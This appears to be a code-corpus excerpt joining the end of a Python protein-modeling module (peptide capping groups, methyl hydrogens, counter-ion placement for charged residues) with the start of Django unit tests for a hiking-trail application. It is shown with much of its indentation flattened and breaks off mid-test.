answer.set_atom('C', Cs[0])
else:
            raise BrInputError(next_aa,
                               'cannot find "C" atom when building ACE.')
Os = next_aa.pickup_atoms('O')
if len(Os) > 0:
answer.set_atom('O', Os[0])
else:
            raise BrInputError(next_aa,
                               'cannot find "O" atom when building ACE.')
answer |= self.add_methyl(answer['CA'], answer['C'])
answer.path = '/ACE'
return answer
def get_NME_simple(self, next_aa):
"""
        Turn the neighboring C-alpha position into a methyl group.
"""
answer = AtomGroup()
CAs = next_aa.pickup_atoms('CA')
if len(CAs) > 0:
answer.set_atom('CA', CAs[0])
else:
            raise BrInputError(next_aa,
                               'cannot find "CA" atom when building NME.')
Ns = next_aa.pickup_atoms('N')
if len(Ns) > 0:
answer.set_atom('N', Ns[0])
else:
            raise BrInputError(next_aa,
                               'cannot find "N" atom when building NME.')
Hs = next_aa.pickup_atoms('H')
if len(Hs) > 0:
answer.set_atom('H', Hs[0])
else:
# for proline
CDs = next_aa.pickup_atoms('CD')
if len(CDs) > 0:
dummy_H = Atom(CDs[0])
dummy_H.symbol = 'H'
answer.set_atom('H', dummy_H)
else:
                raise BrInputError(next_aa,
                                   'cannot find "H" or "CD" atom (for proline) when building NME.')
answer |= self.add_methyl(answer['CA'], answer['N'])
answer.path = '/NME'
return answer
# -----------------------------------------------------------------
def get_ACE(self, res, next_aa=None):
"""
template (ACE-ALA-NME) format:
HH3[1-3]-CH3-C - N-CA(HA)-C- N-CH3-HH3[1-3]
|| | | || |
O H CB O H
"""
AAN = None
rmsd_min = 1000.0
for comformer in self._ACE_ALA_NME_comformers:
ref_AAN = self._get_ACE_ALA_NME(comformer)
(matched, rmsd) = self._match_ACE(ref_AAN, res, next_aa)
# print(comformer, rmsd)
if rmsd < rmsd_min:
rmsd_min = rmsd
AAN = matched
if rmsd_min > 1.0:
logger.warn("RMSD value is too large: {}".format(rmsd))
answer = AtomGroup(AAN['1'])
answer.path = '/ACE'
return answer
def _match_ACE(self, AAN, res, next_aa):
'''AAN (ACE-ALA-NME)
'''
assert(isinstance(AAN, AtomGroup))
assert(isinstance(res, AtomGroup))
(AAN_part, res_part) = self._match_residues(AAN['2'], res)
# for ACE
if next_aa is not None:
if next_aa.has_atom('N'):
AAN_part.set_atom('N2', AAN['3']['N'])
res_part.set_atom('N2', next_aa['N'])
if next_aa.has_atom('H'):
AAN_part.set_atom('NH2', AAN['3']['H'])
res_part.set_atom('NH2', next_aa['H'])
if next_aa.has_atom('CA'):
AAN_part.set_atom('CH3', AAN['3']['CH3'])
res_part.set_atom('CH3', next_aa['CA'])
sp = Superposer(AAN_part, res_part)
rmsd = sp.rmsd
matched_AAN = sp.superimpose(AAN)
return (matched_AAN, rmsd)
def get_NME(self, res, next_aa=None):
"""
template (ACE-ALA-NME) format:
HH3[1-3]-CH3-C - N-CA(HA)-C- N-CH3-HH3[1-3]
|| | | || |
O H CB O H
"""
AAN = None
rmsd_min = 1000.0
for comformer in self._ACE_ALA_NME_comformers:
ref_AAN = self._get_ACE_ALA_NME(comformer)
(matched, rmsd) = self._match_NME(ref_AAN, res, next_aa)
# print(comformer, rmsd)
if rmsd < rmsd_min:
rmsd_min = rmsd
AAN = matched
if rmsd_min > 1.0:
logger.warn("RMSD value is too large: {}".format(rmsd))
answer = AtomGroup(AAN['3'])
answer.path = '/NME'
return answer
def _match_NME(self, AAN, res, next_aa):
'''AAN (ACE-ALA-NME)
'''
assert(isinstance(AAN, AtomGroup))
assert(isinstance(res, AtomGroup))
(AAN_part, res_part) = self._match_residues(AAN['2'], res)
# for NME
if next_aa is not None:
if next_aa.has_atom('C'):
AAN_part.set_atom('C2', AAN['1']['C'])
res_part.set_atom('C2', next_aa['C'])
if next_aa.has_atom('O'):
AAN_part.set_atom('O2', AAN['1']['O'])
res_part.set_atom('O2', next_aa['O'])
if next_aa.has_atom('CA'):
AAN_part.set_atom('CH3', AAN['1']['CH3'])
res_part.set_atom('CH3', next_aa['CA'])
sp = Superposer(AAN_part, res_part)
rmsd = sp.rmsd
matched_AAN = sp.superimpose(AAN)
return (matched_AAN, rmsd)
def _match_residues(self, res1, res2, max_number_of_atoms=-1):
"""
        Match the N, H, CA, HA, C, and O atoms between two amino-acid residues.
        If a residue is a proline, its CD carbon is used in place of the amide H.
        GLY is not matched on HA since it has HA1 and HA2 instead.
"""
atom_names = ['CA', 'O', 'C', 'N', 'CB', 'HA']
if max_number_of_atoms == -1:
max_number_of_atoms = len(atom_names)
ans_res1 = AtomGroup()
ans_res2 = AtomGroup()
for atom_name in atom_names:
pickup_atoms1 = res1.pickup_atoms(atom_name)
if len(pickup_atoms1) > 0:
pickup_atoms2 = res2.pickup_atoms(atom_name)
if len(pickup_atoms2) > 0:
ans_res1.set_atom(atom_name, pickup_atoms1[0])
ans_res2.set_atom(atom_name, pickup_atoms2[0])
if ans_res1.get_number_of_atoms() >= max_number_of_atoms:
break
# match amino-'H'
if ans_res1.get_number_of_atoms() < max_number_of_atoms:
res1_H = None
res2_H = None
if res1.has_atom('H'):
res1_H = res1['H']
elif res1.has_atom('CD'):
# for proline
res1_H = res1['CD']
if res2.has_atom('H'):
res2_H = res2['H']
elif res2.has_atom('CD'):
res2_H = res2['CD']
if ((res1_H is not None) and (res2_H is not None)):
ans_res1.set_atom('H', res1_H)
ans_res2.set_atom('H', res2_H)
return (ans_res1, ans_res2)
# -----------------------------------------------------------------
def add_methyl(self, C1, C2):
"""
        Add the hydrogens of a -CH3 group.
        The hydrogens are attached to C1, using C2 to orient the group.
"""
assert(isinstance(C1, Atom))
assert(isinstance(C2, Atom))
ethane = AtomGroup()
ethane.set_atom('C1', Atom(symbol='C', name='C1',
position=Position(0.00000, 0.00000, 0.00000)))
ethane.set_atom('H11', Atom(symbol='H', name='H11',
position=Position(-0.85617, -0.58901, -0.35051)))
ethane.set_atom('H12', Atom(symbol='H', name='H12',
position=Position(-0.08202, 1.03597, -0.35051)))
ethane.set_atom('H13', Atom(symbol='H', name='H13',
position=Position(0.93818, -0.44696, -0.35051)))
ethane.set_atom('C2', Atom(symbol='C', name='C2',
position=Position(0.00000, 0.00000, 1.47685)))
ethane.set_atom('H21', Atom(symbol='H', name='H21',
position=Position(-0.93818, 0.44696, 1.82736)))
ethane.set_atom('H22', Atom(symbol='H', name='H22',
position=Position(0.85617, 0.58901, 1.82736)))
ethane.set_atom('H23', Atom(symbol='H', name='H23',
position=Position(0.08202, -1.03597, 1.82736)))
inC21 = C2.xyz - C1.xyz
refC21 = ethane['C2'].xyz - ethane['C1'].xyz
shift = C1.xyz - ethane['C1'].xyz
rot = self.arbitary_rotate_matrix(inC21, refC21)
ethane.rotate(rot)
ethane.shift_by(shift)
assert(C1.xyz == ethane['C1'].xyz)
answer = AtomGroup()
answer.set_atom('H11', ethane['H11'])
answer.set_atom('H12', ethane['H12'])
answer.set_atom('H13', ethane['H13'])
return answer
# -----------------------------------------------------------------
def get_NH3(self, angle=0.5 * math.pi, length=1.0):
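        # Builds an NH3 fragment: N at the origin with three H atoms opened by
        # `angle` from the z-axis and spaced 120 degrees apart around it.
        # Hypothetical usage: modeling.get_NH3(angle=math.radians(109.5), length=1.0)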
pi23 = math.pi * 2.0 / 3.0 # (pi * 2/3)
sin23 = math.sin(pi23)
cos23 = math.cos(pi23)
# pi43 = math.pi * 4.0 / 3.0 # (pi * 4/3)
# sin43 = math.sin(pi43)
# cos43 = math.cos(pi43)
sin_input = math.sin(angle)
cos_input = math.cos(angle)
        # rotate by 120 degrees about the z-axis
# z1_rot = Matrix(3, 3)
# z1_rot.set(0, 0, cos23)
# z1_rot.set(0, 1, -sin23)
# z1_rot.set(1, 0, sin23)
# z1_rot.set(1, 1, cos23)
# z1_rot.set(2, 2, 1.0)
        # rotate by 240 degrees about the z-axis
# z2_rot = Matrix(3, 3)
# z2_rot.set(0, 0, cos43)
# z2_rot.set(0, 1, -sin43)
# z2_rot.set(1, 0, sin43)
# z2_rot.set(1, 1, cos43)
# z2_rot.set(2, 2, 1.0)
        # rotate about the y-axis
# y_rot = Matrix(3, 3)
# y_rot.set(0, 0, cos_input)
# y_rot.set(0, 2, -sin_input)
# y_rot.set(2, 0, sin_input)
# y_rot.set(2, 2, cos_input)
# y_rot.set(1, 1, 1.0)
# pos_H1 = Position(1.0, 0.0, 0.0)
# pos_H1.rotate(y_rot)
# pos_H1 *= length
# pos_H2 = Position(1.0, 0.0, 0.0)
# pos_H2.rotate(y_rot)
# pos_H2.rotate(z1_rot)
# pos_H2 *= length
# pos_H3 = Position(1.0, 0.0, 0.0)
# pos_H3.rotate(y_rot)
# pos_H3.rotate(z2_rot)
# pos_H3 *= length
        # open by `angle` from the z-axis in the X-Z plane (rotation about the Y axis)
xz_rot = Matrix(3, 3)
xz_rot.set(0, 0, cos_input)
xz_rot.set(0, 2, -sin_input)
xz_rot.set(2, 0, sin_input)
xz_rot.set(2, 2, cos_input)
xz_rot.set(1, 1, 1.0)
        # open by 120 degrees in the X-Y plane (rotation about the Z axis)
xy_rot = Matrix(3, 3)
xy_rot.set(0, 0, cos23)
xy_rot.set(0, 1, -sin23)
xy_rot.set(1, 0, sin23)
xy_rot.set(1, 1, cos23)
xy_rot.set(2, 2, 1.0)
pos_H1 = Position(0.0, 0.0, 1.0)
pos_H1.rotate(xz_rot)
pos_H2 = Position(0.0, 0.0, 1.0)
pos_H2.rotate(xz_rot)
pos_H2.rotate(xy_rot)
pos_H3 = Position(0.0, 0.0, 1.0)
pos_H3.rotate(xz_rot)
pos_H3.rotate(xy_rot)
pos_H3.rotate(xy_rot)
pos_H1 *= length
pos_H2 *= length
pos_H3 *= length
NH3 = AtomGroup()
N = Atom(symbol='N',
position=Position(0.0, 0.0, 0.0))
H1 = Atom(symbol='H',
position=pos_H1)
H2 = Atom(symbol='H',
position=pos_H2)
H3 = Atom(symbol='H',
position=pos_H3)
# X1 = Atom(symbol = 'X',
# position = Position(1.0, 0.0, 0.0))
# X2 = Atom(symbol = 'X',
# position = Position(0.0, 1.0, 0.0))
# X3 = Atom(symbol = 'X',
# position = Position(0.0, 0.0, 1.0))
NH3.set_atom('N', N)
NH3.set_atom('H1', H1)
NH3.set_atom('H2', H2)
NH3.set_atom('H3', H3)
# NH3.set_atom('X1', X1)
# NH3.set_atom('X2', X2)
# NH3.set_atom('X3', X3)
return NH3
# -----------------------------------------------------------------
def select_residues(self, chain, from_resid, to_resid):
'''
        Return the consecutive amino-acid residues from from_resid to to_resid.
'''
answer = AtomGroup()
for resid, res in chain.groups():
resid = int(resid)
if from_resid <= resid <= to_resid:
answer |= res
return answer
# -----------------------------------------------------------------
def arbitary_rotate_matrix(self, in_a, in_b):
"""
        Return the 3x3 rotation matrix that aligns vector a with vector b.
"""
assert(isinstance(in_a, Position))
assert(isinstance(in_b, Position))
a = Position(in_a)
b = Position(in_b)
a.norm()
b.norm()
cos_theta = a.dot(b)
sin_theta = math.sqrt(1 - cos_theta * cos_theta)
n = a.cross(b)
n.norm()
nx = n.x
ny = n.y
nz = n.z
rot = Matrix(3, 3)
rot.set(0, 0, nx * nx * (1.0 - cos_theta) + cos_theta)
rot.set(0, 1, nx * ny * (1.0 - cos_theta) + nz * sin_theta)
rot.set(0, 2, nx * nz * (1.0 - cos_theta) - ny * sin_theta)
rot.set(1, 0, nx * ny * (1.0 - cos_theta) - nz * sin_theta)
rot.set(1, 1, ny * ny * (1.0 - cos_theta) + cos_theta)
        rot.set(1, 2, ny * nz * (1.0 - cos_theta) + nx * sin_theta)
rot.set(2, 0, nx * nz * (1.0 - cos_theta) + ny * sin_theta)
rot.set(2, 1, ny * nz * (1.0 - cos_theta) - nx * sin_theta)
rot.set(2, 2, nz * nz * (1.0 - cos_theta) + cos_theta)
return rot
# -----------------------------------------------------------------
def get_last_index(self, res):
answer = 0
re_obj = re.compile('([0-9]+)')
for key, atom in res.atoms():
m = re_obj.search(key)
if m is not None:
num = m.group(0)
num = int(num)
answer = max(num, answer)
return answer
# -----------------------------------------------------------------
def neutralize_Nterm(self, res):
answer = None
if res.name == "PRO":
answer = self._neutralize_Nterm_PRO(res)
else:
answer = self._neutralize_Nterm(res)
return answer
def _neutralize_Nterm(self, res):
"""
        Return a Cl- (as an AtomGroup) to neutralize the N-terminal side.
        H1, H2, and HXT (or H3) must be present on the residue.
"""
ag = AtomGroup()
ag.set_atom('N', res['N'])
ag.set_atom('H1', res['H1'])
ag.set_atom('H2', res['H2'])
if res.has_atom('HXT'):
ag.set_atom('H3', res['HXT'])
elif res.has_atom('H3'):
ag.set_atom('H3', res['H3'])
pos = self._get_neutralize_pos_NH3_type(ag)
answer = AtomGroup()
Cl = Atom(symbol='Cl',
name='Cl',
position=pos)
answer.set_atom('Cl', Cl)
return answer
def _neutralize_Nterm_PRO(self, res):
"""in case of 'PRO', neutralize N-term
"""
ag = AtomGroup()
ag.set_atom('N', res['N'])
ag.set_atom('H2', res['H2'])
if res.has_atom('HXT'):
ag.set_atom('H1', res['HXT'])
elif res.has_atom('H3'):
ag.set_atom('H1', res['H3'])
pos = self._get_neutralize_pos_NH2_type(ag)
answer = AtomGroup()
Cl = Atom(symbol='Cl',
name='Cl',
position=pos)
answer.set_atom('Cl', Cl)
return answer
def neutralize_Cterm(self, res):
"""
        Return a Na+ (as an AtomGroup) to neutralize the C-terminal side.
"""
ag = AtomGroup()
ag.set_atom('C', res['C'])
ag.set_atom('O1', res['O'])
ag.set_atom('O2', res['OXT'])
pos = self._get_neutralize_pos_COO_type(ag)
answer = AtomGroup()
Na = Atom(symbol='Na',
name='Na',
position=pos)
answer.set_atom('Na', Na)
return answer
# -----------------------------------------------------------------
def neutralize_GLU(self, res):
ag = AtomGroup()
ag.set_atom('C', res['CD'])
ag.set_atom('O1', res['OE1'])
ag.set_atom('O2', res['OE2'])
pos = self._get_neutralize_pos_COO_type(ag)
answer = AtomGroup()
Na = Atom(symbol='Na',
name='Na',
position=pos)
key = self.get_last_index(res)
answer.set_atom('{}_Na'.format(key + 1), Na)
return answer
def neutralize_ASP(self, res):
ag = AtomGroup()
ag.set_atom('C', res['CG'])
ag.set_atom('O1', res['OD1'])
ag.set_atom('O2', res['OD2'])
pos = self._get_neutralize_pos_COO_type(ag)
answer = AtomGroup()
Na = Atom(symbol='Na',
name='Na',
position=pos)
key = self.get_last_index(res)
answer.set_atom('{}_Na'.format(key + 1), Na)
return answer
def neutralize_LYS(self, res):
ag = AtomGroup()
ag.set_atom('N', res['NZ'])
ag.set_atom('H1', res['HZ1'])
ag.set_atom('H2', res['HZ2'])
ag.set_atom('H3', res['HZ3'])
pos = self._get_neutralize_pos_NH3_type(ag)
answer = AtomGroup()
Cl = Atom(symbol='Cl',
name='Cl',
position=pos)
key = self.get_last_index(res)
answer.set_atom('{}_Cl'.format(key + 1), Cl)
return answer
def neutralize_ARG(self, res, case=0):
"""
        case 0: midpoint between the NH1 and NH2 nitrogens
        case 1: NH1 side
        case 2: NH2 side
"""
case = int(case)
pos = Position()
if case == 0:
length = 3.0
NH1 = res['NH1']
NH2 = res['NH2']
CZ = res['CZ']
M = Position(0.5 * (NH1.xyz.x + NH2.xyz.x),
0.5 * (NH1.xyz.y + NH2.xyz.y),
0.5 * (NH1.xyz.z + NH2.xyz.z))
vCM = M - CZ.xyz
vCM.norm()
pos = CZ.xyz + length * vCM
elif case == 1:
length = 2.0
HH11 = res['HH11']
HH12 = res['HH12']
N = res['NH1']
M = Position(0.5 * (HH11.xyz.x + HH12.xyz.x),
0.5 * (HH11.xyz.y + HH12.xyz.y),
0.5 * (HH11.xyz.z + HH12.xyz.z))
vNM = M - N.xyz
vNM.norm()
pos = N.xyz + length * vNM
elif case == 2:
length = 2.0
HH21 = res['HH21']
HH22 = res['HH22']
N = res['NH2']
M = Position(0.5 * (HH21.xyz.x + HH22.xyz.x),
0.5 * (HH21.xyz.y + HH22.xyz.y),
0.5 * (HH21.xyz.z + HH22.xyz.z))
vNM = M - N.xyz
vNM.norm()
pos = N.xyz + length * vNM
else:
pass
answer = AtomGroup()
Cl = Atom(symbol='Cl',
name='Cl',
position=pos)
key = self.get_last_index(res)
answer.set_atom('{}_Cl'.format(key + 1), Cl)
return answer
# ------------------------------------------------------------------
def neutralize_FAD(self, ag):
print("neutralize_FAD")
print(ag)
answer = AtomGroup()
POO1 = AtomGroup()
POO1.set_atom('P', ag['P'])
# amber format: OP1, pdb: O1P
if ag.has_atom('O1P'):
POO1.set_atom('O1', ag['O1P'])
elif ag.has_atom('OP1'):
POO1.set_atom('O1', ag['OP1'])
else:
            raise BrInputError(ag, 'cannot find "O1P"/"OP1" atom when neutralizing FAD.')
# amber format: OP2, pdb: O2P
if ag.has_atom('O2P'):
POO1.set_atom('O2', ag['O2P'])
elif ag.has_atom('OP2'):
POO1.set_atom('O2', ag['OP2'])
else:
            raise BrInputError(ag, 'cannot find "O2P"/"OP2" atom when neutralizing FAD.')
Na1 = Atom(symbol='Na',
name='Na',
position=self._get_neutralize_pos_POO_type(POO1))
POO2 = AtomGroup()
POO2.set_atom('P', ag['PA'])
POO2.set_atom('O1', ag['O1A']) # amber format: OA1, pdb: O1A
POO2.set_atom('O2', ag['O2A']) # amber format: OA2, pdb: O2A
Na2 = Atom(symbol='Na',
name='Na',
position=self._get_neutralize_pos_POO_type(POO2))
key = self.get_last_index(ag)
answer.set_atom('{}_Na1'.format(key + 1), Na1)
answer.set_atom('{}_Na2'.format(key + 1), Na2)
return answer
# ------------------------------------------------------------------
def _get_neutralize_pos_NH3_type(self, ag):
length = 3.187
H1 = ag['H1']
H2 = ag['H2']
H3 = ag['H3']
N = ag['N']
        # compute the centroid of the three hydrogens
M = Position((H1.xyz.x + H2.xyz.x + H3.xyz.x) / 3.0,
(H1.xyz.y + H2.xyz.y + H3.xyz.y) / 3.0,
(H1.xyz.z + H2.xyz.z + H3.xyz.z) / 3.0)
vNM = M - N.xyz
vNM.norm()
return N.xyz + length * vNM
def _get_neutralize_pos_NH2_type(self, ag):
length = 3.187
H1 = ag['H1']
H2 = ag['H2']
N = ag['N']
vNH1 = H1.xyz - N.xyz
vNH2 = H2.xyz - N.xyz
vM = 0.5 * (vNH1 + vNH2)
vM.norm()
answer = N.xyz + length * vM
return answer
def _get_neutralize_pos_COO_type(self, ag):
length = 2.521
O1 = ag['O1']
O2 = ag['O2']
C = ag['C']
        # compute the midpoint of the two oxygens
M = Position(0.5 * (O1.xyz.x + O2.xyz.x),
0.5 * (O1.xyz.y + O2.xyz.y),
0.5 * (O1.xyz.z + O2.xyz.z))
vCM = M - C.xyz
vCM.norm()
return C.xyz + length * vCM
# -----------------------------------------------------------------
def _get_neutralize_pos_POO_type(self, ag):
length = 2.748
O1 = ag['O1']
O2 = ag['O2']
P = ag['P']
M = Position(0.5 * (O1.xyz.x + O2.xyz.x),
0.5 * (O1.xyz.y + O2.xyz.y),
0.5 * (O1.xyz.z + O2.xyz.z))
vPM = M - P.xyz
vPM.norm()
return P.xyz + length * vPM
if __name__ == "__main__":
import doctest
doctest.testmod()
|
ProteinDF/ProteinDF_bridge
|
proteindf_bridge/modeling.py
|
Python
|
gpl-3.0
| 24,765 | 0.000371 |
from django.test import TestCase
from django.contrib.gis.geos import (LineString, Polygon, MultiPolygon,
MultiLineString, MultiPoint, Point)
from django.core.exceptions import ValidationError
from django.conf import settings
from django.test.utils import override_settings
from unittest import skipIf
from bs4 import BeautifulSoup
from geotrek.common.tests import TranslationResetMixin
from geotrek.core.tests.factories import PathFactory
from geotrek.zoning.tests.factories import DistrictFactory, CityFactory
from geotrek.trekking.tests.factories import (POIFactory, TrekFactory,
TrekWithPOIsFactory, ServiceFactory,
RatingFactory, RatingScaleFactory)
from geotrek.trekking.models import Trek, OrderedTrekChild
class TrekTest(TranslationResetMixin, TestCase):
def test_is_publishable(self):
t = TrekFactory.create()
t.geom = LineString((0, 0), (1, 1))
self.assertTrue(t.has_geom_valid())
t.description_teaser = ''
self.assertFalse(t.is_complete())
self.assertFalse(t.is_publishable())
t.description_teaser = 'ba'
t.departure = 'zin'
t.arrival = 'ga'
self.assertTrue(t.is_complete())
self.assertTrue(t.is_publishable())
t.geom = MultiLineString([LineString((0, 0), (1, 1)), LineString((2, 2), (3, 3))])
self.assertFalse(t.has_geom_valid())
self.assertFalse(t.is_publishable())
def test_any_published_property(self):
t = TrekFactory.create(published=False)
t.published_fr = False
t.published_it = False
t.save()
self.assertFalse(t.any_published)
t.published_it = True
t.save()
self.assertTrue(t.any_published)
@override_settings(PUBLISHED_BY_LANG=False)
def test_any_published_without_published_by_lang(self):
t = TrekFactory.create(published=False)
t.published_fr = True
t.save()
self.assertFalse(t.any_published)
def test_published_status(self):
t = TrekFactory.create(published=False)
t.published_fr = False
t.published_it = True
t.save()
self.assertEqual(t.published_status, [
{'lang': 'en', 'language': 'English', 'status': False},
{'lang': 'es', 'language': 'Spanish', 'status': False},
{'lang': 'fr', 'language': 'French', 'status': False},
{'lang': 'it', 'language': 'Italian', 'status': True}])
@override_settings(PUBLISHED_BY_LANG=False)
def test_published_status_without_published_by_lang(self):
t = TrekFactory.create(published=True)
t.published_fr = False
t.published_it = False
t.save()
self.assertEqual(t.published_status, [
{'lang': 'en', 'language': 'English', 'status': True},
{'lang': 'es', 'language': 'Spanish', 'status': True},
{'lang': 'fr', 'language': 'French', 'status': True},
{'lang': 'it', 'language': 'Italian', 'status': True}])
@override_settings(PUBLISHED_BY_LANG=False)
def test_published_langs_without_published_by_lang_not_published(self):
t = TrekFactory.create(published=False)
t.published_fr = True
t.published_it = True
t.save()
self.assertEqual(t.published_langs, [])
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
def test_kml_coordinates_should_be_3d(self):
trek = TrekWithPOIsFactory.create()
kml = trek.kml()
parsed = BeautifulSoup(kml, 'lxml')
for placemark in parsed.findAll('placemark'):
coordinates = placemark.find('coordinates')
tuples = [s.split(',') for s in coordinates.string.split(' ')]
self.assertTrue(all([len(i) == 3 for i in tuples]))
def test_pois_types(self):
trek = TrekWithPOIsFactory.create()
type0 = trek.pois[0].type
type1 = trek.pois[1].type
self.assertEqual(2, len(trek.poi_types))
self.assertIn(type0, trek.poi_types)
self.assertIn(type1, trek.poi_types)
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
def test_delete_cascade(self):
p1 = PathFactory.create()
p2 = PathFactory.create()
t = TrekFactory.create(paths=[p1, p2])
# Everything should be all right before delete
self.assertTrue(t.published)
self.assertFalse(t.deleted)
self.assertEqual(t.aggregations.count(), 2)
# When a path is deleted
p1.delete()
t = Trek.objects.get(pk=t.pk)
self.assertFalse(t.published)
self.assertFalse(t.deleted)
self.assertEqual(t.aggregations.count(), 1)
# Reset published status
t.published = True
t.save()
# When all paths are deleted
p2.delete()
t = Trek.objects.get(pk=t.pk)
self.assertFalse(t.published)
self.assertTrue(t.deleted)
self.assertEqual(t.aggregations.count(), 0)
def test_treks_are_sorted_by_name(self):
TrekFactory.create(name='Cb')
TrekFactory.create(name='Ca')
TrekFactory.create(name='A')
TrekFactory.create(name='B')
self.assertQuerysetEqual(Trek.objects.all(),
['<Trek: A>', '<Trek: B>', '<Trek: Ca>', '<Trek: Cb>'],
ordered=False)
def test_trek_itself_as_parent(self):
"""
Test if a trek it is its own parent
"""
trek1 = TrekFactory.create(name='trek1')
OrderedTrekChild.objects.create(parent=trek1, child=trek1)
self.assertRaisesMessage(ValidationError,
"Cannot use itself as child trek.",
trek1.full_clean)
class TrekPublicationDateTest(TranslationResetMixin, TestCase):
def setUp(self):
self.trek = TrekFactory.create(published=False)
def test_default_value_is_null(self):
self.assertIsNone(self.trek.publication_date)
def test_takes_current_date_when_published_becomes_true(self):
self.trek.published = True
self.trek.save()
self.assertIsNotNone(self.trek.publication_date)
def test_becomes_null_when_unpublished(self):
self.test_takes_current_date_when_published_becomes_true()
self.trek.published = False
self.trek.save()
self.assertIsNone(self.trek.publication_date)
def test_date_is_not_updated_when_saved_again(self):
import datetime
self.test_takes_current_date_when_published_becomes_true()
old_date = datetime.date(2003, 8, 6)
self.trek.publication_date = old_date
self.trek.save()
self.assertEqual(self.trek.publication_date, old_date)
class RelatedObjectsTest(TranslationResetMixin, TestCase):
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
def test_helpers(self):
p1 = PathFactory.create(geom=LineString((0, 0), (4, 4)))
p2 = PathFactory.create(geom=LineString((4, 4), (8, 8)))
trek = TrekFactory.create(paths=[(p1, 0.5, 1), (p2, 0, 1)])
poi = POIFactory.create(paths=[(p1, 0.6, 0.6)])
poi2 = POIFactory.create(paths=[(p1, 0.6, 0.6)])
service = ServiceFactory.create(paths=[(p1, 0.7, 0.7)])
service.type.practices.add(trek.practice)
trek.pois_excluded.add(poi2.pk)
# /!\ District are automatically linked to paths at DB level
d1 = DistrictFactory.create(geom=MultiPolygon(
Polygon(((-2, -2), (3, -2), (3, 3), (-2, 3), (-2, -2)))))
# Ensure related objects are accessible
self.assertCountEqual(trek.pois_excluded.all(), [poi2])
self.assertCountEqual(trek.all_pois, [poi, poi2])
self.assertCountEqual(trek.pois, [poi])
self.assertCountEqual(trek.services, [service])
self.assertCountEqual(poi.treks, [trek])
self.assertCountEqual(service.treks, [trek])
self.assertCountEqual(trek.districts, [d1])
# Ensure there is no duplicates
self.assertCountEqual(trek.pois_excluded.all(), [poi2])
self.assertCountEqual(trek.all_pois, [poi, poi2])
self.assertCountEqual(trek.pois, [poi])
self.assertCountEqual(trek.services, [service])
self.assertCountEqual(poi.treks, [trek])
self.assertCountEqual(service.treks, [trek])
d2 = DistrictFactory.create(geom=MultiPolygon(
Polygon(((3, 3), (9, 3), (9, 9), (3, 9), (3, 3)))))
self.assertCountEqual(trek.districts, [d1, d2])
@skipIf(settings.TREKKING_TOPOLOGY_ENABLED, 'Test without dynamic segmentation only')
def test_helpers_nds(self):
trek = TrekFactory.create(geom=LineString((2, 2), (8, 8)))
poi = POIFactory.create(geom=Point(2.4, 2.4))
poi2 = POIFactory.create(geom=Point(2.4, 2.4))
service = ServiceFactory.create(geom=Point(2.8, 2.8))
service.type.practices.add(trek.practice)
trek.pois_excluded.add(poi2.pk)
# /!\ District are automatically linked to paths at DB level
d1 = DistrictFactory.create(geom=MultiPolygon(
Polygon(((-2, -2), (3, -2), (3, 3), (-2, 3), (-2, -2)))))
# Ensure related objects are accessible
self.assertCountEqual(trek.pois_excluded.all(), [poi2])
self.assertCountEqual(trek.all_pois, [poi, poi2])
self.assertCountEqual(trek.pois, [poi])
self.assertCountEqual(trek.services, [service])
self.assertCountEqual(poi.treks, [trek])
self.assertCountEqual(service.treks, [trek])
self.assertCountEqual(trek.districts, [d1])
@skipIf(settings.TREKKING_TOPOLOGY_ENABLED, 'Test without dynamic segmentation only')
def test_deleted_pois_nds(self):
trek = TrekFactory.create(geom=LineString((0, 0), (4, 4)))
poi = POIFactory.create(geom=Point(2.4, 2.4))
self.assertCountEqual(trek.pois, [poi])
poi.delete()
self.assertCountEqual(trek.pois, [])
@skipIf(settings.TREKKING_TOPOLOGY_ENABLED, 'Test without dynamic segmentation only')
def test_deleted_services_nds(self):
trek = TrekFactory.create(geom=LineString((0, 0), (4, 4)))
service = ServiceFactory.create(geom=Point(2.4, 2.4))
service.type.practices.add(trek.practice)
self.assertCountEqual(trek.services, [service])
service.delete()
self.assertCountEqual(trek.services, [])
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
def test_deleted_pois(self):
p1 = PathFactory.create(geom=LineString((0, 0), (4, 4)))
trek = TrekFactory.create(paths=[p1])
poi = POIFactory.create(paths=[(p1, 0.6, 0.6)])
self.assertCountEqual(trek.pois, [poi])
poi.delete()
self.assertCountEqual(trek.pois, [])
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
def test_deleted_services(self):
p1 = PathFactory.create(geom=LineString((0, 0), (4, 4)))
trek = TrekFactory.create(paths=[p1])
service = ServiceFactory.create(paths=[(p1, 0.6, 0.6)])
service.type.practices.add(trek.practice)
self.assertCountEqual(trek.services, [service])
service.delete()
self.assertCountEqual(trek.services, [])
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
def test_pois_should_be_ordered_by_progression(self):
p1 = PathFactory.create(geom=LineString((0, 0), (4, 4)))
p2 = PathFactory.create(geom=LineString((4, 4), (8, 8)))
self.trek = TrekFactory.create(paths=[p1, p2])
self.trek_reverse = TrekFactory.create(paths=[(p2, 0.8, 0), (p1, 1, 0.2)])
self.poi1 = POIFactory.create(paths=[(p1, 0.8, 0.8)])
self.poi2 = POIFactory.create(paths=[(p1, 0.3, 0.3)])
self.poi3 = POIFactory.create(paths=[(p2, 0.5, 0.5)])
pois = self.trek.pois
self.assertEqual([self.poi2, self.poi1, self.poi3], list(pois))
pois = self.trek_reverse.pois
self.assertEqual([self.poi3, self.poi1, self.poi2], list(pois))
@skipIf(settings.TREKKING_TOPOLOGY_ENABLED, 'Test without dynamic segmentation only')
def test_pois_is_not_ordered_by_progression(self):
self.trek = TrekFactory.create(geom=LineString((0, 0), (8, 8)))
self.trek_reverse = TrekFactory.create(geom=LineString((6.4, 6.4), (0.8, 0.8)))
self.poi1 = POIFactory.create(geom=Point(3.2, 3.2))
self.poi2 = POIFactory.create(geom=Point(1.2, 1.2))
self.poi3 = POIFactory.create(geom=Point(4, 4))
pois = self.trek.pois
self.assertCountEqual([self.poi1, self.poi2, self.poi3], pois)
pois = self.trek_reverse.pois
self.assertCountEqual([self.poi1, self.poi2, self.poi3], pois)
@skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only')
def test_city_departure(self):
